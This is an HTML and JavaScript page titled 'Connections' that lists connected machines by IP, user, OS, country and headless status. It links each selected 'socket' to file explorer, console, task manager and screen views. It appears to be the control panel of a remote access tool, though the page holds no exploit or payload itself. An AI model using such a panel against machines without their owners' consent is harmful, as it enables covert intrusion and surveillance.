<!DOCTYPE html>
<html lang="en">

<head>
	<title>Connections</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" href="https://i.imgur.com/CsVKESW.jpg">
	<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
	<style type="text/css">
		@import url("https://fonts.googleapis.com/css?family=Roboto+Mono");

		table {
			width: 100%;
			border-collapse: collapse;
		}

		th,
		td {
			border: 1px solid darkorange;
			padding: 8px;
			text-align: center;
		}

		th {
			background-color: orange;
			font-weight: bold;
		}

		tr:nth-child(even) {
			background-color: #f2f2f2;
		}

		tr:nth-child(odd) {
			background-color: #FFF;
		}

		tr:hover {
			background-color: lightgray;
			cursor: pointer;
		}

		header-table {
			position: absolute;
		}

		.headbtn {
			padding: 10px 20px;
			background-color: #007bff;
			color: #fff;
			text-decoration: none;
			border-radius: 5px;
			margin-left: 4px;
		}

		.headbtn:hover {
			background-color: green;
		}

		.logo {
			max-width: 100px;
		}

		body {
			font-family: "Roboto", sans-serif;
			background-color: #f7f7f7;
			padding: 20px;
		}

		.title {
			text-align: center;
			flex-grow: 1;
		}

		.header {
			display: flex;
			justify-content: space-between;
			align-items: center;
			padding: 20px;
		}
	</style>
</head>

<body>
	<div class="header">
		<img src="https://i.imgur.com/CsVKESW.jpg" alt="Lgo" class="logo">
		<h1 class="title">Connections</h1>
		<a href="explorer?" class="headbtn">Explorer</a>
		<a href="console?" class="headbtn">Console</a>
		<a href="taskmgr?" class="headbtn">Taskmgr</a>
		<a href="screen?" class="headbtn">Screen</a>
		<a href="license?" class="headbtn">License</a>
	</div>
	<div class="header">
		<h4>Total connected: <span id="total_connected">0</span></h4>
		<p>Selected socket: <span id="selected_socket">null</span></p>
	</div>
	<table>
		<div id="table-container">
			<div>
	</table>
</body>
<script>

	function updateTable() {
		fetch("/api/connections")
			.then(response => response.json())
			.then(data => {
				let jsonArray = data;
				console.log("Received: ", jsonArray);

				let tableContainer = document.getElementById("table-container");
				while (tableContainer.firstChild) {
					tableContainer.removeChild(tableContainer.firstChild);
				}
				let totalc = document.getElementById("total_connected");
				totalc.textContent = jsonArray.length;
				let table = document.createElement("table");
				let headerRow = table.insertRow();

				let ipCell = document.createElement("th");
				ipCell.textContent = "IP";
				headerRow.appendChild(ipCell);
				let userCell = document.createElement("th");
				userCell.textContent = "USER";
				headerRow.appendChild(userCell);
				let osCell = document.createElement("th");
				osCell.textContent = "OS";
				headerRow.appendChild(osCell);
				let countryCell = document.createElement("th");
				countryCell.textContent = "Country";
				headerRow.appendChild(countryCell);
				let nativeCell = document.createElement("th");
				nativeCell.textContent = "Native";
				headerRow.appendChild(nativeCell);
				let robotCell = document.createElement("th");
				robotCell.textContent = "Headless";
				headerRow.appendChild(robotCell);

				jsonArray.forEach((item) => {
					let row = table.insertRow();
					row.classList.add("data-row");
					Object.values(item).forEach((value) => {
						let cell = row.insertCell();
						cell.textContent = value;
					});
				});

				tableContainer.appendChild(table);
			})
			.catch(error => {
				console.error('Error: ', error);
			});
	}
	function updateLinks(selected1) {
		let linkElements = document.querySelectorAll(".headbtn");
		linkElements.forEach((linkElement) => {
			let currentHref = linkElement.getAttribute("href");
			let newUrl = currentHref.split("?")[0];
			linkElement.setAttribute("href", newUrl + "?socket=" + selected1);
			let selectedsocket = document.getElementById("selected_socket");
			selectedsocket.textContent = selected1;
		});
	}
	let selected = "null";
	const url = window.location.href;
	if (window.location.href.includes("?socket=")) {
		selected = url.split("?socket=")[1];
	}
	setInterval(updateTable, 2000);
	setInterval(() => {
		updateLinks(selected);
	}, 10);
	document
		.getElementById("table-container")
		.addEventListener("click", function (event) {
			if (event.target.tagName === "TD") {
				let selectedRow = event.target.parentNode;
				let rowData = Array.from(selectedRow.children).map(
					(cell) => cell.textContent
				);
				console.log("Selected: ", rowData);
				selected = rowData;
				Swal.fire("Selected socket:" + rowData, "", "success");
			}
		});
</script>

</html>